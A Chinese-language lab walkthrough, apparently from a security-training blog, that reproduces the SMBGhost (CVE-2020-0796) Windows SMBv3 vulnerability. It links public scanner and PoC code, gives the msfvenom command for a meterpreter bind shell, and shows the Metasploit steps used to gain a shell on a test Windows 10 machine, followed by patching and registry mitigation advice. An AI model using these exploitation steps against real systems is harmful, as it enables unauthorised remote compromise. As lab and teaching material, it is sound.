cve-2020-0796_永恒之黑:CVE20200796漏洞复现

1f9eea3dd0753da6b88ce124d1ea9cc5.png

2017年,“永恒之蓝”,

3年之后,

“永恒之黑” 来了。

漏洞介绍

3月12日, 微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒之黑”。

本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒之黑一旦被成功利用,其危害不亚于永恒之蓝。


同时,CVE-2020-0796漏洞与“永恒之蓝”系列漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。 漏洞危害等级:高危 “永恒之黑”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。 漏洞影响范围 Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)

漏洞复现

想要复现这个永恒之黑,大家可以搭建靶机来完成,如下所示:

1、环境准备

Win10 靶机:192.168.183.133

Kali 攻击机192.168.183.136

一定要记住:关闭防火墙,关闭防火墙,关闭防火墙!!!

2、查看环境情况

Windows版本,按win+r,在弹出窗口中,输入 winver

bbaa4b7f4e8f426b1ccdea7b21881724.png

3、使用SMBGhost工具检测靶机是否存在漏洞

SMBGhost下载地址:https://github.com/ollypwn/SMBGhost

9f4cc8853160d7cc1304f8030737f87f.png

4、使用蓝屏payload,验证漏洞

蓝屏POC地址:https://github.com/chompie1337/SMBGhost_RCE_PoC

演示:蓝屏

fde4385656fc9db4543a2078a9deb266.png

09159e70760b7d5ce840f3f7047c6e67.png以上的步骤成功证明漏洞存在。

5、利用msf生成exp反弹shell

msfvenom -p windows/x64/meterpreter/bind_tcpLPORT=4444 -b '\x00' -i 1 -f python>exploit

打开蓝屏POC 的exploit.py 文件将生成的 USER_PAYLOAD 替换为生成的exp

(注意:buf 要替换为 USER_PAYLOAD)

c2ba041e4d9870e7df5af1cfc84c8c05.png

蓝屏POC exploit 实况图

43b167d92fdd0d479729f1ada8027e2c.png

Msf生成exp实况图

9bada876efa0e8ec4c8a14e7960600ef.png

修改exploit.py 文件 实况图

6、设置msf监听

use payload windows/x64/meterpreter/bind_tcpset lport  监听端口Set rhost  目标ip

af4bf72fc2ce92fa33e920c56b39ab52.png

run/exploit 执行监听

7、运行修改之后的exp

python3 exploit.py  -ip  目标ip

e0530bd355aaa29b3a6fc1af128cba02.png

成功反弹meterpreter,执行shell命令查看IP地址为win10机器地址

479d52c7d18ab0d6314331a5294e79a0.png

漏洞修复

1、更新系统、完成补丁的安装:
操作步骤:设置->更新和安全->Windows更新,点击“检查更新”。 2、不更新系统的临时应对方法:
运行regedit.exe,打开注册表编辑器,在HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters建立一个名为DisableCompression的DWORD,值为1,禁止SMB的压缩功能。 3、封禁SMB通信445端口。 永恒之蓝复现: MS17-010漏洞回顾 END

信安客旨在培养网络安全人才,分享安全行业最新动态、技术交流、等保相关标准等。

b2257772143367671ce76bad7928a9f2.png

  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值